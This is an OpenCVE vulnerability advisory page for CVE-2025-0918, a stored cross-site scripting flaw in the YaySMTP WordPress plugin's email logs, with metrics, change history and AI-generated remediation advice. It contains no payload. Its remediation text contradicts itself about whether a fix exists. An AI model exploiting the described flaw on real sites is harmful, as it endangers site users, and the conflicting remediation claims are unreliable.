Description
The SMTP for SendGrid – YaySMTP plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
Published: 2025-02-22
Score: 7.2 High
EPSS: < 1% Very Low
KEV: No
Impact: Stored Cross‑Site Scripting
Action: Patch Immediately
AI Analysis

Impact

The SMTP for SendGrid – YaySMTP plugin for WordPress, in versions up to and including 1.4, suffers from a stored cross‑site scripting flaw. Insufficient input sanitization and output escaping in the email logging component permit an unauthenticated attacker to insert arbitrary JavaScript into log entries. When a user opens a page that displays such a log entry, the injected script runs in the user’s browser, potentially altering the page’s appearance or behaviour as defined by the attacker.

Affected Systems

Any WordPress site that has installed the yaycommerce SMTP for SendGrid – YaySMTP plugin version 1.4 or earlier is affected. The vulnerability is present in the email logging functionality of the plugin and does not depend on additional configuration beyond the presence of the plugin itself.

Risk and Exploitability

With a CVSS score of 7.2 the flaw is considered high severity, but the EPSS score of less than 1 % indicates that exploitation is currently unlikely. The vulnerability is not listed in CISA KEV. Attackers can exploit the flaw by sending log entries containing malicious scripts; the scripts are executed whenever a site user or administrator views the affected log page, providing the attacker a persistent client‑side vector.

Generated by OpenCVE AI on April 22, 2026 at 02:06 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Upgrade the SMTP for SendGrid – YaySMTP plugin to the latest version, which removes the XSS vulnerability.
  • If a patch cannot be applied immediately, disable the email log viewing feature or restrict its access to trusted administrator accounts to prevent script execution.
  • Implement a web application firewall or enforce strict input validation on the WordPress site to block or sanitize malicious payloads targeting the plugin’s email logging endpoints.

Generated by OpenCVE AI on April 22, 2026 at 02:06 UTC.

Tracking

Sign in to view the affected projects.

Advisories
Source ID Title
EUVD EUVD EUVD-2025-4439 The SMTP for SendGrid – YaySMTP plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.3.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
History

Wed, 08 Apr 2026 19:30:00 +0000

Type Values Removed Values Added
References

Wed, 08 Apr 2026 18:30:00 +0000

Type Values Removed Values Added
Description The SMTP for SendGrid – YaySMTP plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.3.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The SMTP for SendGrid – YaySMTP plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
Title SMTP for SendGrid – YaySMTP <= 1.3.1 - Unauthenticated Stored Cross-Site Scripting via Email Logs SMTP for SendGrid – YaySMTP <= 1.4 - Unauthenticated Stored Cross-Site Scripting via Email Logs
References

Wed, 05 Mar 2025 22:00:00 +0000

Type Values Removed Values Added
First Time appeared Yaycommerce
Yaycommerce yaysmtp
CPEs cpe:2.3:a:yaycommerce:yaysmtp:*:*:*:*:*:wordpress:*:*
Vendors & Products Yaycommerce
Yaycommerce yaysmtp

Mon, 24 Feb 2025 13:15:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'yes', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Sat, 22 Feb 2025 12:45:00 +0000

Type Values Removed Values Added
Description The SMTP for SendGrid – YaySMTP plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.3.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
Title SMTP for SendGrid – YaySMTP <= 1.3.1 - Unauthenticated Stored Cross-Site Scripting via Email Logs
Weaknesses CWE-79
References
Metrics cvssV3_1

{'score': 7.2, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N'}

Subscriptions

Yaycommerce Yaysmtp
cve-icon MITRE

Status: PUBLISHED

Assigner: Wordfence

Published:

Updated: 2026-04-08T17:18:05.508Z

Reserved: 2025-01-31T00:06:27.898Z

Link: CVE-2025-0918

cve-icon Vulnrichment

Updated: 2025-02-24T12:51:41.632Z

cve-icon NVD

Status : Modified

Published: 2025-02-22T13:15:11.687

Modified: 2026-04-08T19:22:48.870

Link: CVE-2025-0918

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-04-22T02:15:05Z

Weaknesses